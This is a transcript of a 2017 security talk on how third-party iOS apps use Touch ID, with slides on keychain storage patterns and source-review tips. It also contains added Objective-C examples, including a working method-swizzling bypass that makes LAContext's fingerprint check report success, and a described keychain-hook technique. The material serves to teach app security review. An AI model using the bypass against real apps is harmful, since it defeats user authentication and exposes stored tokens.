Jamie Bowser - A Touch(ID) of iOS Security

Uploaded by: centralohioissa
Posted on: 24-Jan-2017

TRANSCRIPT

Page 1: Jamie Bowser - A Touch(ID) of iOS Security

Copyright © 2015, Cigital

A Touch(ID) of iOS Security

Page 2

About me…
• Cigital (3 years)
  • Technical Strategist - Mobile (iOS)
  • Sr. Consultant (iOS Tooling)
  • Consultant (MDM Implementation and iOS Security guidelines)
• KeyBank (12+ years)
  • Application Security Program Owner (web, mobile, mainframe)
  • Java Web Developer (external and internal sites)
• Other (x+y/z years)
  • NASA UNIX Administrator / Web administrator
  • Developer
  • iOS Developer (Touch Unlock by: Reconditorium Limited)

Page 3

Presentation Scope
• In
  • Use of Touch ID in third-party applications
  • How to spot Local Authentication
  • Bypass-ability
• Out
  • Apple Pay usage
  • iOS (Apple) usage

Page 4

TOUCHID OVERVIEW

Page 5

What really is Touch ID?
• Touch ID is Apple's biometric fingerprint authentication technology.
• Reads the fingerprint and stores a "mathematical representation" of the fingerprint in the "Secure Enclave"
  • The Secure Enclave is a "walled off architecture", separated from the rest of the device at the hardware level
  • Able to store multiple fingerprint representations
• Client-side authentication
  • Biometric
  • Possible form of second-factor authentication

Page 6

TouchID Architecture
• Changed with each major release of iOS since it was introduced
• Getting better…?
• Currently 3 options to discuss
  • Option 1 – iOS 7 release - initial Touch ID release
  • Option 2 – iOS 8 release
  • Option 3 – iOS 9 release

Page 7

TouchID Architecture – Release 1
• Architecture is not visible to iOS applications – other than Apple's applications

[Diagram: TouchID Sensor – hardware-protected connection – Secure Enclave (Fingerprint Representation) – Local Authentication API – Apple Applications; Third-Party Applications shown with no path to the API]

Page 8

Implementations – Release 1
• No third-party implementation available
• No "public" API
• Only public API usage is allowed in the Apple App Store

Page 9

TouchID Architecture – Release 2
• Architecture becomes visible to iOS applications – in addition to Apple's applications

[Diagram: TouchID Sensor – hardware-protected connection – Secure Enclave (Fingerprint Representation) – Local Authentication API – Apple Applications and Third-Party Applications]

Page 10

Implementations – Release 2
• Typical implementation

[Flowchart]
Enrollment: Start → Authenticate → Place token in Keychain **
Later use: Start → Check Local Auth API → Get token from Keychain → Use token

** Add an attribute to the Keychain entry that ties it to having a passcode on the device – not really associated with Touch ID

Page 11

Implementations – Release 2
• Many third-party application teams jumped in and implemented something
• And have not updated it since…

Page 12

TouchID Architecture – Release 3
• Architecture is visible to iOS applications – in addition to Apple's applications (requires iOS 9.x)

[Diagram: TouchID Sensor – hardware-protected connection – Secure Enclave (Fingerprint Representation) – Local Authentication API and Security Framework – Apple Applications and Third-Party Applications]

Page 13

Implementations – Release 3
• Typical implementation

[Flowchart]
Enrollment: Start → Authenticate → Place token in Keychain *
Later use: Start → Check Local Auth API ** → Attempt to get token from Keychain → Trigger system checks → Use token

* Add an attribute to the Keychain entry that ties it to Touch ID requirements
** Optional

Page 14

Implementations – Release 3
• Does require iOS release restrictions on users
  • Not everybody updates
• Can detect the iOS version and fall back to a weaker implementation, but the result is only as strong as the weakest link
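The two storage patterns behind the Release 2 and Release 3 flowcharts, written out side by side, with the version-gated fallback that the slide above warns about. This is an added example, not code from the slides; the TokenStore class, kTokenService and kTokenAccount names are assumptions, and it assumes an iOS 9 SDK so that the Touch ID access-control flags and kSecUseAuthenticationContext are available.

```objc
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#import <LocalAuthentication/LocalAuthentication.h>

// Assumed identifiers for the example; any service/account pair works.
static NSString *const kTokenService = @"com.example.touchid-demo";
static NSString *const kTokenAccount = @"session-token";

@interface TokenStore : NSObject
+ (OSStatus)storeWeak:(NSData *)token;    // Release 2 pattern
+ (OSStatus)storeStrong:(NSData *)token;  // Release 3 pattern
+ (OSStatus)store:(NSData *)token;        // version-gated fallback (Page 14)
+ (NSData *)loadWithContext:(LAContext *)context status:(OSStatus *)status;
@end

@implementation TokenStore

+ (NSMutableDictionary *)baseQuery {
    return [@{ (__bridge id)kSecClass:       (__bridge id)kSecClassGenericPassword,
               (__bridge id)kSecAttrService: kTokenService,
               (__bridge id)kSecAttrAccount: kTokenAccount } mutableCopy];
}

// Release 2: the item is tied only to "a passcode is set". Touch ID never
// gates this item; the app's own evaluatePolicy: result is the only gate,
// and that result is a BOOL decided inside the app process.
+ (OSStatus)storeWeak:(NSData *)token {
    NSMutableDictionary *attrs = [self baseQuery];
    attrs[(__bridge id)kSecValueData] = token;
    attrs[(__bridge id)kSecAttrAccessible] =
        (__bridge id)kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly;
    SecItemDelete((__bridge CFDictionaryRef)[self baseQuery]); // replace any old copy
    return SecItemAdd((__bridge CFDictionaryRef)attrs, NULL);
}

// Release 3 (iOS 9): the Secure Enclave enforces the ACL. SecItemCopyMatching
// itself triggers the Touch ID prompt; no fingerprint, no data. CurrentSet
// (rather than Any) also invalidates the item if fingerprints are added or
// removed after it was stored. Do not also set kSecAttrAccessible here; the
// ACL carries the protection class.
+ (OSStatus)storeStrong:(NSData *)token {
    CFErrorRef error = NULL;
    SecAccessControlRef acl = SecAccessControlCreateWithFlags(
        kCFAllocatorDefault,
        kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
        kSecAccessControlTouchIDCurrentSet,
        &error);
    if (acl == NULL) {
        if (error) CFRelease(error);
        return errSecParam;
    }
    NSMutableDictionary *attrs = [self baseQuery];
    attrs[(__bridge id)kSecValueData] = token;
    attrs[(__bridge id)kSecAttrAccessControl] = (__bridge_transfer id)acl;
    SecItemDelete((__bridge CFDictionaryRef)[self baseQuery]);
    return SecItemAdd((__bridge CFDictionaryRef)attrs, NULL);
}

// Page 14's point: detecting the OS version and falling back keeps the app
// working on older devices, but anyone holding an un-updated device gets the
// weak path, so the scheme is only as strong as that fallback.
+ (OSStatus)store:(NSData *)token {
    BOOL hasACLFlags = [[NSProcessInfo processInfo]
        isOperatingSystemAtLeastVersion:(NSOperatingSystemVersion){9, 0, 0}];
    return hasACLFlags ? [self storeStrong:token] : [self storeWeak:token];
}

// One read path for both items. For the strong item the prompt appears here
// and errSecUserCanceled / errSecAuthFailed are returned on failure; the weak
// item comes back with errSecSuccess and no prompt at all.
+ (NSData *)loadWithContext:(LAContext *)context status:(OSStatus *)status {
    NSMutableDictionary *query = [self baseQuery];
    query[(__bridge id)kSecReturnData] = @YES;
    query[(__bridge id)kSecUseOperationPrompt] = @"Unlock your session token";
    if (context) query[(__bridge id)kSecUseAuthenticationContext] = context;
    CFTypeRef result = NULL;
    OSStatus st = SecItemCopyMatching((__bridge CFDictionaryRef)query, &result);
    if (status) *status = st;
    return st == errSecSuccess ? (__bridge_transfer NSData *)result : nil;
}

@end
```

Reading the two store methods against the flowcharts: with storeWeak, the "Check Local Auth API" box is the whole defence, and the keychain read that follows it succeeds regardless of what the sensor said; with storeStrong, the "Trigger system checks" box is where the fingerprint is actually demanded, and an app-level evaluatePolicy: call in front of it is optional decoration.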

Page 15

HOW TO SPOT LOCAL AUTHENTICATION

Doing Source Code Review?

Page 16

Spotting Local Authentication

#import <LocalAuthentication/LocalAuthentication.h>

// Review targets: LAContext and evaluatePolicy:localizedReason:reply:.
// Note that "success" is a BOOL handed to the app; nothing is decrypted or
// released by the system on the strength of it.
LAContext *context = [[LAContext alloc] init];
__block NSString *message;
// Show the authentication UI with our reason string.
[context evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics
        localizedReason:@"Unlock access to locked feature"
                  reply:^(BOOL success, NSError *authenticationError) {
    if (success) {
        message = @"evaluatePolicy: success";
    } else {
        message = [NSString stringWithFormat:@"evaluatePolicy: %@",
                   authenticationError.localizedDescription];
    }
    // The reply block runs on a private queue, not the main thread, so a
    // real UI update here belongs inside dispatch_async(dispatch_get_main_queue(), ...).
    [self printMessage:message inTextView:self.textView];
}];

Page 17

Spotting Local Authentication

#import <Security/Security.h>
#import <LocalAuthentication/LocalAuthentication.h>

// Review targets: SecAccessControlCreateWithFlags, kSecAttrAccessControl and
// the kSecAccessControlTouchID* flags. "context" is the LAContext from the
// previous slide; because the ACL includes kSecAccessControlApplicationPassword,
// that context must carry the application password (set with
// -setCredential:type: and LACredentialTypeApplicationPassword) or the add fails.
CFErrorRef error = NULL;
SecAccessControlRef sacObject = SecAccessControlCreateWithFlags(
    kCFAllocatorDefault,
    kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
    kSecAccessControlTouchIDAny | kSecAccessControlApplicationPassword,
    &error);

NSData *secretPasswordTextData = [@"SECRET_PASSWORD_TEXT" dataUsingEncoding:NSUTF8StringEncoding];

NSDictionary *attributes = @{
    (__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,
    (__bridge id)kSecAttrService: @"SampleService",
    (__bridge id)kSecValueData: secretPasswordTextData,
    (__bridge id)kSecUseNoAuthenticationUI: @YES,
    (__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacObject,
    (__bridge id)kSecUseAuthenticationContext: context
};

OSStatus status = SecItemAdd((__bridge CFDictionaryRef)attributes, NULL);

* kSecAccessControlTouchIDCurrentSet – the stricter alternative to kSecAccessControlTouchIDAny: the item becomes unreadable if fingerprints are added or removed after it was stored.

Page 18

TOUCHID BY-PASSING

Page 19

TouchID By-passing
• When determining risk, consider the following:
• Jailbroken device
  • By-passable via both the API and the Keychain access control
    • Swizzle the API
    • Hook the Keychain API and strip the access control (the kSecAttrAccessControl attribute from the SecItemAdd dictionary) when the item is inserted
  • SuccessID
    • Does not implement the access-control removal
    • https://hexplo.it/successid-touchid-override-simulation/
• Non-jailbroken device
  • By-passable using the API
    • Swizzle the API
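The "Swizzle the API" item above, written out as an added example (not code from the slides): an Objective-C category on LAContext that exchanges the Page 16 method with one that reports success without ever touching the sensor. It has to be loaded into the target process; how that is done (a repackaged app, an injected dynamic library) is outside this block. The category name Bypass and the bypass_ method prefix are assumptions.

```objc
#import <objc/runtime.h>
#import <Foundation/Foundation.h>
#import <LocalAuthentication/LocalAuthentication.h>

@implementation LAContext (Bypass)

// +load runs when the category is linked into the process, before any app
// code calls evaluatePolicy:, so every later call lands on our replacement.
+ (void)load {
    static dispatch_once_t once;
    dispatch_once(&once, ^{
        Class cls = self;
        SEL original = @selector(evaluatePolicy:localizedReason:reply:);
        SEL swizzled = @selector(bypass_evaluatePolicy:localizedReason:reply:);
        Method origMethod = class_getInstanceMethod(cls, original);
        Method swizMethod = class_getInstanceMethod(cls, swizzled);
        method_exchangeImplementations(origMethod, swizMethod);
    });
}

// After the exchange, bypass_... is what the app reaches when it calls the
// original selector. Calling bypass_... from here would reach the real
// implementation; we never do, because the point is to skip the prompt and
// hand the app the BOOL it is waiting for.
- (void)bypass_evaluatePolicy:(LAPolicy)policy
              localizedReason:(NSString *)reason
                        reply:(void (^)(BOOL success, NSError *error))reply {
    (void)policy;
    (void)reason;
    // The real method invokes reply on a private queue; do the same so the
    // app's threading assumptions, whatever they are, stay unchanged.
    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
        reply(YES, nil);
    });
}

@end
```

Against the Release 2 flow this is the whole attack: the app sees success, reads the passcode-protected token from the keychain and carries on. Against the Release 3 flow it changes nothing, because the token is released by SecItemCopyMatching under an access control the Secure Enclave enforces and no in-process BOOL is consulted. That is why the slide lists a second hook for jailbroken devices, on the keychain insert path, which only works if the attacker is already present when the token is first stored.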

Page 20

Questions

email: [email protected]
